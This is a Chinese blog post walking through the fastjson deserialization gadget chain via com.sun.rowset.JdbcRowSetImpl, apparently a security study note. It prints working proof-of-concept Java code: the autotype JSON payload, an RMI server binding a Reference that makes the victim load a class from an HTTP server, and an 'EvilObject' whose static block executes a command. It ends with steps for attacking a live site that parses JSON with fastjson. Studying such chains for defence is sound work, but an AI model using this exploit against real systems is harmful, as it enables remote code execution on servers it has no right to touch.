fastjson反序列化-JdbcRowSetImpl利用链

时间:2022-06-01 03:31:47

fastjson反序列化-JdbcRowSetImpl利用链

JdbcRowSetImpl利用链

fastjson反序列化JdbcRowSetImpl - Afant1 - 博客园 (cnblogs.com)

这里涉及了JNDI与RMI的概念。

其本质为JNDI注入。

附上示例代码

JdbcRowSetImplPoC.java

package org.lain.poc.poclist;

import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.parser.ParserConfig; /**
* @author: ZH3FENG
* @Date: 下午7:53 2017/12/11
* @Modified By:
* @Description: Gadget com.sun.rowset.JdbcRowSetImpl
*
* setAutoCommit() -> connect() -> InitialContext.lookup()
*/
public class JdbcRowSetImplPoC { public static void testJdbcRowSetImpl(String dataSourceName){ ParserConfig config = new ParserConfig(); config.setAutoTypeSupport(true);// String payload = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\","
+ "\"dataSourceName\":\"" + dataSourceName + "\","
+ "\"autoCommit\":\"true\"}";
System.out.println(payload); try{
JSONObject.parse(payload,config);
}catch (Exception e){
e.printStackTrace();
}
}
}

RMIServer.java

package org.lain.poc.jndi;
import com.sun.jndi.rmi.registry.ReferenceWrapper; import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry; /**
* @author: lanqihe
* @Date: 下午8:01 2017/12/11
* @Modified By:
* @Description: 本地注册一个register,并将恶意的类绑定
*/
public class RMIServer { public static void main(String argv[]) { try {
Registry registry = LocateRegistry.createRegistry(1090); //如果通过rmi无法找到org.lain.poc.jndi.EvilObjectFactory,则尝试从factoryLocation 获取
//因此,本地测试的话,如果factory正确,factoryLocation随便填
//把一个对象绑定到rmi注册表中,这个对象需要继承UnicastRemoteObject,但是Reference没有继承它,所以我们还需要封装一下它,用 ReferenceWrapper 包裹一下Reference实例对象,这样就可以将其绑定到rmi注册表,并被远程访问到了
Reference reference = new Reference("EvilObject",
"org.lain.poc.jndi.EvilObjectFactory",
"http://localhost:9999/" ); //客户端通过evil查找,获取到EvilObject
registry.bind("evil", new ReferenceWrapper(reference)); System.out.println("Ready!");
System.out.println("Waiting for connection......"); } catch (Exception e) {
System.out.println("RMIServer: " + e.getMessage());
e.printStackTrace();
}
}
}

EvilObject.java

package org.lain.poc.jndi;

import java.io.IOException;

/**
* @author: ZH3FENG
* @Date: 上午10:18 2017/12/12
* @Modified By:
* @Description: 模拟一个恶意类,静态代码块执行命令
*/
public class EvilObject { public EvilObject(){
System.out.println("Hi!");
}
/**
* 简单的命令执行
*/
static {
try {
Runtime.getRuntime().exec("calc");
}catch (IOException e){
//ignore
}
}
}

我们在JSONObject.parse方法下断点调试

fastjson反序列化-JdbcRowSetImpl利用链

还是调用了parse.Object,步入

fastjson反序列化-JdbcRowSetImpl利用链

fastjson反序列化-JdbcRowSetImpl利用链

调用deserialze方法,进行反序列化

fastjson反序列化-JdbcRowSetImpl利用链

接下来会对JdbcRowSetImpl进行 初始化

fastjson反序列化-JdbcRowSetImpl利用链

在调用完构造函数后,parseObject还会去调用set方法。

根据poc的字段,可以在setDataSourceName与setAutoCommit下断点。

发现确实调用了这两个函数,在setDataSourceName方法中设置了数据源,setAutoCommit方法中,调用了connect方法。

fastjson反序列化-JdbcRowSetImpl利用链

connect方法

fastjson反序列化-JdbcRowSetImpl利用链

lookup方法

fastjson反序列化-JdbcRowSetImpl利用链

decodeObject中就是解析reference,之后调用getOnjectInstance去实例化对象。

fastjson反序列化-JdbcRowSetImpl利用链

调用流程总结:

fastjson反序列化-JdbcRowSetImpl利用链

具体利用方法:

Fastjson反序列化漏洞利用 - 简书 (jianshu.com)

搭建一个rmi服务器和一个http服务器

将exp类部署到http服务器上。

如果目标网站存在fastjson包,且有json格式数据的输入点。则可以构造json数据,达到远程调用http服务器上的类,造成命令执行。